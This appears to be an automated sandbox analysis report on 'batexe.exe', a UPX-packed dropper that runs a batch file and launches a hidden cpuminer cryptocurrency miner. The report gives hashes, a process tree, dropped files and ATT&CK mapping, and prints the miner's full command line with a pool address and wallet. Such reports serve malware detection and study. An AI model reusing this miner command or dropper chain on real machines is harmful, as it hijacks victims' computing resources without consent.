73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
305s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
19/02/2024, 13:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2052	b2e.exe
3968	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3756-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3756 wrote to memory of 2052	3756	batexe.exe	72
PID 3756 wrote to memory of 2052	3756	batexe.exe	72
PID 3756 wrote to memory of 2052	3756	batexe.exe	72
PID 2052 wrote to memory of 3604	2052	b2e.exe	73
PID 2052 wrote to memory of 3604	2052	b2e.exe	73
PID 2052 wrote to memory of 3604	2052	b2e.exe	73
PID 3604 wrote to memory of 3968	3604	cmd.exe	76
PID 3604 wrote to memory of 3968	3604	cmd.exe	76

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3756
- C:\Users\Admin\AppData\Local\Temp\E53.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\E53.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\E53.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\171D.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3604
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\171D.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\E53.tmp\b2e.exe

Filesize
512KB

MD5
e4d2817f5e794155ac4a8a1445b9d728

SHA1
07f6972ab84878cee3a3e158cf9b0b27c8ad175d

SHA256
24781b2a837565d59faae5eff35a839726a5aa2f952f46e5e5b593f53ab6774b

SHA512
9ed2839db8465f9eb07d9bb2d29e1a35cc1c2e0b8c8f52007248752df018c899135e6d3f944e7e1363b3d5fe4928ccb71725fcaafedfd3cd496307619cf164f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\E53.tmp\b2e.exe

Filesize
5.0MB

MD5
d5b93016c9709e4808b7b53800cb2fa0

SHA1
29f03e4b6ccb7d1ad1c84b173faba4dfa92ef70e

SHA256
0ce7b15f4782cff150f3af0812598d752d25528361af98e64ce9dc59024ab357

SHA512
3033fefdc96832de4d19d8e36cde6d0f8b6ab0a67aeda6fb7194d8460f20a6348ef9fe731c55404eebd0eb5d7a5293a4cbe541a6c14fb9def81d5c43347de2a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
802KB

MD5
63298277a9f67faf02f49b03c565ddf7

SHA1
d07b5cd9bb2f7b6309cd1ade5cfc20485a4d8a44

SHA256
8ffdb722a6406b39b30916c7dd585eba695b2fc93cc02445685cb6f6da4e4f55

SHA512
055ca06dd34b7e052342ef7093c2dc3fb16d6e4db3f262914fbb66fc79ae31360e8cdc2bd851041c476c3b672385a55126bde58476ea7873fbbe8b062a85b5ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
778KB

MD5
aebf363fa03ba224c59f829f0dcd8952

SHA1
00fc2f1bc28ca6840538a62d202a506821081b4e

SHA256
dd30716b8847f4a49dee46f003492f521fede46a3e237cdeff90bc397de1fa7a

SHA512
a2566861da0ddeb270daf0ce5297b2a636eefeeaac3516cd241c37284532a70dc59ae4e22191d0e29825fd3045b225e96de2a6b7726115b8c1da1c757116c893

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
640KB

MD5
ac7d1c3bb4d3c69372907331267c1ee7

SHA1
fa82689799785ef9ab4c304b1c1a6d2d9a961928

SHA256
d22689ab67764158df7b19e8d78ec1393899f21e390f469a300975a31106c3aa

SHA512
0d541661060d7c5eed486ea0377142e7d3883b3c0935114679af28bcae0b1767585fe06328955cf59aab4fe3d4acfba525dbc42675fbce80b7d0b2300784d125

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
511KB

MD5
62369d853d83048b54ad1ac49bd1eee3

SHA1
d75be14256b67673f95483f14f1bc53744132f77

SHA256
6b2cb9a1d09b6c43252ca9618415d174188372bf0c909f0b7cc419731ece54cc

SHA512
263cd6b576249608f11c5f8106f26e1f11567b7f39349bad20deb0335c19e07d080384c1753efafedef0b006fd64ad36103c345f879d89d232d0a067a6c55487

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
528KB

MD5
2003ee9d6acf7b89dd789d1db874d2c3

SHA1
61bccf3f8f9a76c4f3364e30ed2adfce475f028f

SHA256
009b10323a5fcdc1cea31594e59940f8d788bfd5a92080e92ce463aaa5db520e

SHA512
3fd2fdd5b5f82b925177c429dfe84b4ab516f6b8167b48403f36e3d99007dd53d4805b6c7d3811b211928ef2a5f675321c47d3d94857b3037f215f98e61437b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
449KB

MD5
04a952d5faceaa60785b83c2c94de355

SHA1
017e93e8d874eb4e94015c54fc4527cccb3500eb

SHA256
8dc1c61f6206e54807c98527d40974232ad04f59fb5630ef2a0af3261eaf1f74

SHA512
7d527b50a599132b086b379a40409ab38d67e9e23607c8b43f26cca33cb465ca92d1be736b856df5765b5a18454e5afd60514aa5c19eb30a648f1dd45d8e2a50

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
555KB

MD5
24539fd9d152717cad76f1c047c4e2c5

SHA1
58fa91da18dbcdd20eb5ee5b8899b5dd3f871108

SHA256
05b73577b1a82f1c33b863270d95413ea29dbdd1ad5b28fe0c8cb2297b882f04

SHA512
cc84dc4f224efdd9156abdc5c257b844818c880be4d10fc8bb0590fb0d1161a37b7ad0ced56c2de5215e913ea65e33a58897204c32fe17f67392a0bb0fe6cc63

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
532KB

MD5
ee1302e5679270ce7e080d6ccc2ba5e0

SHA1
b5642dd06476b518ce94dd7095071bbb21f1ffb3

SHA256
ea5dac11d2cd1869cf7c37053efc0e0d6fbe2e826b3d7f4521ef9c4da5451070

SHA512
ac2a3c1bf0369b17e52c292a9daed2befbd6c7d19f06381f942eeee8b91f7e18b793359a7c0424289c8392a2d3f9482784f5c99477e9c5b7860dabfb4478fad8

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
576KB

MD5
13746f79a51eb8ce3107de99ffc6b56a

SHA1
64a00c99a805f8775f08cda4e4d06e1150195347

SHA256
2c04d5960f13e859d49c78a8858bdcb0c53914306eba52746105a76d98f5d205

SHA512
d0e69c6cf0078c858e8258a4038098e644d611b544b6588b2b1c9d2d2937ade0472edc96257545f5935514bfa18970f5762eb393def612c5a7027727397ca8d7

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
555KB

MD5
ff417ff7df19d76b0a2b8de1f7869c38

SHA1
1dc4eeaafbf91c49ab049b1f1cc1a076c3f5b6e6

SHA256
c20ffa239d05d3ba711e5d43c4e492e19f23232ac3362d6d21925a87da716df6

SHA512
c7972cdfb20b74995fa1524d996b42bc1c8acca5a6f3c27ff393b6ca3aeae1e5a26bad761f8acb43740d9bda9d2181838916de643b3e87b5128c15a939ccac90

Download Submit
memory/2052-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2052-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3756-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3968-43-0x0000000074E60000-0x0000000074EF8000-memory.dmp

Filesize
608KB

Download
memory/3968-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3968-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3968-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/3968-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-52-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3968-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download